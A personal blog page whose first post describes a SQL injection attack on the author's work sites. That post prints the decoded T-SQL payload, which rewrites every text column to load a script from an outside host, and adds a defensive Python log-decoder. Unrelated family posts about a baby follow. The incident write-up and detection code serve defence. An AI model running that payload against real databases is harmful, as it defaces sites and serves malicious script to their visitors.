Work sites attacked

Just an FYI – some of our old sites are not filtering out injection
attacks and got hosed last weekend. The attack seems fairly
sophisticated (imo) and is described in this post.


If you just copy the hex value from this URL…


And convert this to ASCII values (you can convert hex to ASCII)…

I got this…

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.nihaorr1.com/1.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

SQL Server Injection!!!! Here you can see the script being inserted,
using Table Cursors, into each column in the table. If you read the code
you can see how each table in the entire database will be affected by
this.

The source of this came from 219.153.46.28
(28.46.153.219.broad.cq.cq.dynamic.163data.com.cn); the agent is Indy
Library, a Chinese bot. The agent Indy Library should be blocked entirely.

Our attacks were similar and were also coming from [219.153.46.28].

——————–

If you’ve got crappy/insecure code out there – be warned.
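A small log-review helper for this class of attack, added here as an example (not code from the original post or from the site that was hit). It takes a request URL of the shape shown above, decodes any CAST(0x… AS NVARCHAR) literal as UTF-16LE (NVARCHAR is two bytes per character, which is why the hex reads as ASCII bytes interleaved with 00), and reports which SQL keywords are visible in the raw query string versus only inside the decoded literal. The sample URL, its inner statement and the host name are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# The worm hides its real statement in a CAST(0x... AS NVARCHAR) literal.
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
# Keywords worth flagging; the last four only appear once the hex is decoded.
MARKERS = ("DECLARE ", "EXEC(", "CAST(0X", "CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "<SCRIPT")


def decode_cast_hex(hex_digits):
    """Turn the 0x literal into text. NVARCHAR is UTF-16LE, so 440045004300 -> 'DEC'."""
    raw = bytes.fromhex(hex_digits)
    if len(raw) % 2 == 0:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")  # a single-byte VARCHAR literal would land here


def query_params(url):
    """Split on '&' only: older parse_qsl also splits on ';', which would hide the
    'IT=GM-204;DECLARE ...' shape of this attack."""
    for pair in urlsplit(url).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote_plus(name), unquote_plus(value)


def inspect_request(url):
    """One finding per suspicious parameter: markers seen in the raw value ('raw') and
    markers that only show up after decoding the embedded hex literal ('hidden')."""
    findings = []
    for name, value in query_params(url):
        decoded = [decode_cast_hex(m.group(1)) for m in HEX_CAST.finditer(value)]
        visible, hidden = value.upper(), " ".join(decoded).upper()
        raw_hits = [k for k in MARKERS if k in visible]
        hidden_hits = [k for k in MARKERS if k in hidden and k not in raw_hits]
        if raw_hits or hidden_hits:
            findings.append({"param": name, "raw": raw_hits, "hidden": hidden_hits,
                             "decoded": decoded})
    return findings


# Constructed sample: same outer shape as the logged URL, with a short harmless inner
# statement encoded to UTF-16LE hex exactly the way the CAST literal is built.
INNER_SQL = "DECLARE Table_Cursor CURSOR FOR select a.name from sysobjects a"
SAMPLE_URL = ("http://example.invalid/orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);"
              "SET%20@S=CAST(0x" + INNER_SQL.encode("utf-16-le").hex().upper()
              + "%20AS%20NVARCHAR(4000));EXEC(@S);--")
BENIGN_URL = "http://example.invalid/orderitem.asp?IT=GM-204&qty=2"

if __name__ == "__main__":
    for f in inspect_request(SAMPLE_URL):
        print(f["param"], "raw:", f["raw"], "hidden:", f["hidden"])
        print("decoded:", f["decoded"][0])
```

The lasting fix is on the application side: pass IT as a bound parameter of a prepared statement instead of concatenating it into the query, so the cursor statement never reaches SQL Server as code.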

Poppy went swimming for the first time, today

Poppy went swimming for the first time in her cute little two piece + diaper. Mom and Grannie C and Papa all helped keep her afloat. She did great, not always sure she knew what was going on, but was happy and absorbed the new experience without drinking too much chlorinated water. All told, she was probably in the water for almost an hour.

General update: in Houston, Poppy status = good

Update – we are in Houston for April and May. Staying w/ family and
Anita’s doing her last rotation at a hospital here. They are kicking
her ass and not even saying sorry… but it’s the home stretch till
she’s finally done with school forever! (YAY)

Poppy is big-tastic. She is holding her head up all the time,
laughing a little (when tickled or otherwise super-excited) and smiling
a lot. She’s almost on a schedule – which includes 15-30 min of crying
every night at bed time… but she’s sleeping in her crib like a champ
and is doing very well. She’s a little better w/ tummy time and has
super strong legs… just need to work on those arm muscles.

Photos: http://flickr.com/photos/zeroasterisk/collections/72157603816664754/ — look for new ones in 03 and a few in 04 (more to add sometime soon)

Poppy has laughed – for real – at almost 10 weeks

Penelope has laughed in her sleep and has done some sort-of laughs along the way, but last night, for the first time, she laughed.  We got several giggles from her.  We were tickling her and of course giggling ourselves, but regardless – she laughed.  We were beside ourselves, as would be expected.  She’s starting to make some syllable sounds, but it’s not very far along as of yet.